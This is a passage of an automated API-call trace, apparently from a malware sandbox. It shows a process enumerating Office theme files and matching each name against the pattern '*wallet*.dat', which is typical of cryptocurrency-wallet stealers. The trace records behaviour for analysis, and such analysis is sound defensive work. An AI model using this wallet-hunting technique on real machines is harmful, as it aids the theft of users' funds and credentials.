(in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090430[[fn=Banded]].thmx\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03090430[[fn=banded]].thmx\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x9826b304, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x9826b304, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x70d51000, ftLastWriteTime.dwLowDateTime=0x1d43fbc, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x893c1, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.485] FindNextFileA (in: hFindFile=0x4eac10, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x984f5d1e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x984f5d1e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa299a700, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0x192bb1, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03090434[[fn=Wood Type]].thmx", cAlternateFileName="TM0309~2.THM")) returned 1 [0175.485] PathMatchSpecA (pszFile="TM03090434[[fn=Wood Type]].thmx", pszSpec="*wallet*.dat") returned 0 [0175.486] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090434[[fn=Wood Type]].thmx\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03090434[[fn=wood type]].thmx\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x984f5d1e, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x984f5d1e, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0xa299a700, ftLastWriteTime.dwLowDateTime=0x1d43fbb, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x192bb1, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.486] FindNextFileA (in: hFindFile=0x4eac10, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x988e757c, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x988e757c, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xbdc7df00, ftLastWriteTime.dwHighDateTime=0x1d43fda, nFileSizeHigh=0x0, nFileSizeLow=0x883d3, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03457444[[fn=Basis]].thmx", cAlternateFileName="TM2094~1.THM")) returned 1 [0175.486] PathMatchSpecA (pszFile="TM03457444[[fn=Basis]].thmx", pszSpec="*wallet*.dat") returned 0 [0175.486] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457444[[fn=Basis]].thmx\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457444[[fn=basis]].thmx\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x988e757c, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x988e757c, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0xbdc7df00, ftLastWriteTime.dwLowDateTime=0x1d43fda, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x883d3, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.486] FindNextFileA (in: hFindFile=0x4eac10, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98acf19f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98acf19f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xe42a5200, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0x8b615, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03457464[[fn=Dividend]].thmx", cAlternateFileName="TM5959~1.THM")) returned 1 [0175.486] PathMatchSpecA (pszFile="TM03457464[[fn=Dividend]].thmx", pszSpec="*wallet*.dat") returned 0 [0175.486] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457464[[fn=Dividend]].thmx\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457464[[fn=dividend]].thmx\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x98acf19f, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x98acf19f, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0xe42a5200, ftLastWriteTime.dwLowDateTime=0x1d43fbb, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x8b615, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.487] FindNextFileA (in: hFindFile=0x4eac10, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9841a2b8, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9841a2b8, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xf2786e00, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0x7fb28, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03457475[[fn=Frame]].thmx", cAlternateFileName="TM7844~1.THM")) returned 1 [0175.487] PathMatchSpecA (pszFile="TM03457475[[fn=Frame]].thmx", pszSpec="*wallet*.dat") returned 0 [0175.487] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457475[[fn=Frame]].thmx\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457475[[fn=frame]].thmx\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x9841a2b8, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x9841a2b8, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0xf2786e00, ftLastWriteTime.dwLowDateTime=0x1d43fbb, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x7fb28, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.487] FindNextFileA (in: hFindFile=0x4eac10, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98af6207, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98af6207, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x34091900, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x2ef7a4, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03457485[[fn=Mesh]].thmx", cAlternateFileName="TM2703~1.THM")) returned 1 [0175.487] PathMatchSpecA (pszFile="TM03457485[[fn=Mesh]].thmx", pszSpec="*wallet*.dat") returned 0 [0175.487] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457485[[fn=Mesh]].thmx\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457485[[fn=mesh]].thmx\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x98af6207, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x98af6207, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x34091900, ftLastWriteTime.dwLowDateTime=0x1d43fbc, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x2ef7a4, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.487] FindNextFileA (in: hFindFile=0x4eac10, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x987adf7a, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x987adf7a, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xea6cfe00, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0xbddaf, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03457491[[fn=Metropolitan]].thmx", cAlternateFileName="TM5623~1.THM")) returned 1 [0175.487] PathMatchSpecA (pszFile="TM03457491[[fn=Metropolitan]].thmx", pszSpec="*wallet*.dat") returned 0 [0175.487] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457491[[fn=Metropolitan]].thmx\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457491[[fn=metropolitan]].thmx\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x987adf7a, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x987adf7a, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0xea6cfe00, ftLastWriteTime.dwLowDateTime=0x1d43fbc, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0xbddaf, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.488] FindNextFileA (in: hFindFile=0x4eac10, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x980694ab, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x980694ab, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80545900, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0xe1c0f, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03457496[[fn=Parallax]].thmx", cAlternateFileName="TM0345~2.THM")) returned 1 [0175.488] PathMatchSpecA (pszFile="TM03457496[[fn=Parallax]].thmx", pszSpec="*wallet*.dat") returned 0 [0175.488] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457496[[fn=Parallax]].thmx\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457496[[fn=parallax]].thmx\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x980694ab, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x980694ab, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x80545900, ftLastWriteTime.dwLowDateTime=0x1d43fbc, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0xe1c0f, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.488] FindNextFileA (in: hFindFile=0x4eac10, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9818a945, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9818a945, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xba712b00, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0xec122, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03457503[[fn=Quotable]].thmx", cAlternateFileName="TM0345~4.THM")) returned 1 [0175.488] PathMatchSpecA (pszFile="TM03457503[[fn=Quotable]].thmx", pszSpec="*wallet*.dat") returned 0 [0175.488] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457503[[fn=Quotable]].thmx\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457503[[fn=quotable]].thmx\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x9818a945, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x9818a945, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0xba712b00, ftLastWriteTime.dwLowDateTime=0x1d43fbb, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0xec122, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.488] FindNextFileA (in: hFindFile=0x4eac10, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97fbbf10, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x97fbbf10, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc65ced00, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0x125f51, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03457510[[fn=Savon]].thmx", cAlternateFileName="TM0345~1.THM")) returned 1 [0175.488] PathMatchSpecA (pszFile="TM03457510[[fn=Savon]].thmx", pszSpec="*wallet*.dat") returned 0 [0175.489] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457510[[fn=Savon]].thmx\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457510[[fn=savon]].thmx\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x97fbbf10, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x97fbbf10, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0xc65ced00, ftLastWriteTime.dwLowDateTime=0x1d43fbb, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x125f51, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.489] FindNextFileA (in: hFindFile=0x4eac10, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x980b633e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x980b633e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80545900, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x76cc4, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03457515[[fn=View]].thmx", cAlternateFileName="TM0345~3.THM")) returned 1 [0175.489] PathMatchSpecA (pszFile="TM03457515[[fn=View]].thmx", pszSpec="*wallet*.dat") returned 0 [0175.489] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457515[[fn=View]].thmx\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457515[[fn=view]].thmx\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x980b633e, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x980b633e, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x80545900, ftLastWriteTime.dwLowDateTime=0x1d43fbc, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x76cc4, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.489] FindNextFileA (in: hFindFile=0x4eac10, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978145cc, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x978145cc, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc65ced00, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0xee481, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM04033917[[fn=Berlin]].thmx", cAlternateFileName="TM0403~1.THM")) returned 1 [0175.489] PathMatchSpecA (pszFile="TM04033917[[fn=Berlin]].thmx", pszSpec="*wallet*.dat") returned 0 [0175.489] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033917[[fn=Berlin]].thmx\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033917[[fn=berlin]].thmx\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x978145cc, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x978145cc, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0xc65ced00, ftLastWriteTime.dwLowDateTime=0x1d43fbb, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0xee481, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.490] FindNextFileA (in: hFindFile=0x4eac10, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x984c4fd2, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x984c4fd2, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xdd034400, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0x165552, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM04033919[[fn=Circuit]].thmx", cAlternateFileName="TMFEFA~1.THM")) returned 1 [0175.490] PathMatchSpecA (pszFile="TM04033919[[fn=Circuit]].thmx", pszSpec="*wallet*.dat") returned 0 [0175.490] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033919[[fn=Circuit]].thmx\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033919[[fn=circuit]].thmx\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x984c4fd2, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x984c4fd2, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0xdd034400, ftLastWriteTime.dwLowDateTime=0x1d43fbb, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x165552, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.490] FindNextFileA (in: hFindFile=0x4eac10, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x982f049f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x982f049f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5c911300, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x21dbbf, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM04033921[[fn=Damask]].thmx", cAlternateFileName="TM0403~4.THM")) returned 1 [0175.490] PathMatchSpecA (pszFile="TM04033921[[fn=Damask]].thmx", pszSpec="*wallet*.dat") returned 0 [0175.490] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033921[[fn=Damask]].thmx\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033921[[fn=damask]].thmx\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x982f049f, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x982f049f, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x5c911300, ftLastWriteTime.dwLowDateTime=0x1d43fbc, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x21dbbf, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.491] FindNextFileA (in: hFindFile=0x4eac10, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98ab2749, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98ab2749, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xc68a00, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x1ab70b, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM04033925[[fn=Droplet]].thmx", cAlternateFileName="TM9F98~1.THM")) returned 1 [0175.491] PathMatchSpecA (pszFile="TM04033925[[fn=Droplet]].thmx", pszSpec="*wallet*.dat") returned 0 [0175.491] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033925[[fn=Droplet]].thmx\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033925[[fn=droplet]].thmx\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x98ab2749, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x98ab2749, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0xc68a00, ftLastWriteTime.dwLowDateTime=0x1d43fbc, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x1ab70b, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.491] FindNextFileA (in: hFindFile=0x4eac10, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x981588c3, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x981588c3, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x2358a300, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x2c9ecd, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM04033927[[fn=Main Event]].thmx", cAlternateFileName="TM0403~3.THM")) returned 1 [0175.491] PathMatchSpecA (pszFile="TM04033927[[fn=Main Event]].thmx", pszSpec="*wallet*.dat") returned 0 [0175.491] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033927[[fn=Main Event]].thmx\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033927[[fn=main event]].thmx\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x981588c3, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x981588c3, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x2358a300, ftLastWriteTime.dwLowDateTime=0x1d43fbc, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x2c9ecd, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.492] FindNextFileA (in: hFindFile=0x4eac10, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9852435b, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9852435b, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9cf09100, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x23f73b, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM04033929[[fn=Slate]].thmx", cAlternateFileName="TMA957~1.THM")) returned 1 [0175.492] PathMatchSpecA (pszFile="TM04033929[[fn=Slate]].thmx", pszSpec="*wallet*.dat") returned 0 [0175.492] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM04033929[[fn=Slate]].thmx\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm04033929[[fn=slate]].thmx\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x9852435b, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x9852435b, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x9cf09100, ftLastWriteTime.dwLowDateTime=0x1d43fbc, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x23f73b, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.492] FindNextFileA (in: hFindFile=0x4eac10, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9800b4e9, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9800b4e9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x4f742400, 